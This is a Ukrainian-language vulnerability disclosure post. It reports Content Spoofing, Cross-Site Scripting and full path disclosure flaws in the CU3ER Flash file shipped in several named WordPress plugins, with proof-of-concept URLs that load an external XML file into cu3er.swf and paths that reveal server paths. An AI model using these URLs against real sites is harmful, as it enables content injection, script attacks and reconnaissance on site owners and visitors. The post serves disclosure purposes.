Уразливості в численних плагінах з CU3ER для WordPress
23:56 19.04.2014Раніше я писав про уразливості в CU3ER. Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних плагінах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.
Вчора я писав про wpCU3ER для WordPress. Флешка CU3ER також міститься в наступних плагінах для WordPress: NextGen Cu3er Gallery, Simple Cu3er, Cu3er Post Elements, Gallery Manager, Cu3er Slider та інших плагінах, в тому числі кастом плагінах розроблених для окремих сайтів.
Content Spoofing (WASC-12):
NextGen Cu3er Gallery:
http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/1.xml
Simple Cu3er:
http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/1.xml
Cu3er Post Elements:
http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/1.xml
Gallery Manager:
http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/1.xml
Cu3er Slider:
http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/1.xml
Cross-Site Scripting (WASC-08):
NextGen Cu3er Gallery:
http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/xss.xml
Simple Cu3er:
http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/xss.xml
Cu3er Post Elements:
http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/xss.xml
Gallery Manager:
http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/xss.xml
Cu3er Slider:
http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/xss.xml
1.xml:
xss.xml:
Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.
Full path disclosure (WASC-13):
FPD в php-файлах плагінів (по замовчуванню) або в error_log.
http://site/wp-content/plugins/nextgen-cu3er-gallery/cu3er.php
http://site/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php
http://site/wp-content/plugins/simple-cu3er/simple-cu3er.php
http://site/wp-content/plugins/cu3er-post-elements/cu3er-post-elements.php
http://site/wp-content/plugins/gallery-manager/gallery-manager.php та в багатьох php-файлах в підпапках плагіна
http://site/wp-content/plugins/cu3er-slider/cu3er-slider.php
Уразливі всі плагіни з флешкою CU3ER: NextGen Cu3er Gallery 0.1, Simple Cu3er 1.0.1, Cu3er Post Elements 0.5.1, Gallery Manager, Cu3er Slider та попередні версії цих плагінів.